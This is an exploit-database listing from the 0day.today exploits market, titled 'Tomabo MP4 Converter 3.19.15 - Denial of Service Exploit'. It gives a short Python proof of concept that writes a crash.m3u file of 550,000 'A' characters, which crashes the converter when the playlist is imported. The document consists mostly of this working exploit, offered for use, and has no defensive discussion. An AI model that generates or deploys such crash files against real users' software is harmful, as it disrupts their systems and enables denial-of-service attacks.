[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Tomabo MP4 Converter 3.19.15 - Denial of Service Exploit

Author
Andy Bowden
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-28270
Category
dos / poc
Date add
14-08-2017
Platform
windows
#!/usr/bin/python
 
# Exploit Title: Tomabo MP4 Converter DOS
# Date: 13/08/17
# Exploit Author: Andy Bowden
# Vendor Homepage: http://www.tomabo.com/
# Software Link: http://www.tomabo.com/mp4-converter/index.html
# Version: 3.19.15
# Tested on: Windows 7 x86
# CVE : None
 
#Generate a .m3u file using the python script and import it into the MP4 Converter.
 
file = "crash.m3u"
 
buffer = "A" * 550000
 
f = open(file, "w")
f.write(buffer)
f.close()


#  0day.today [2024-07-08]  #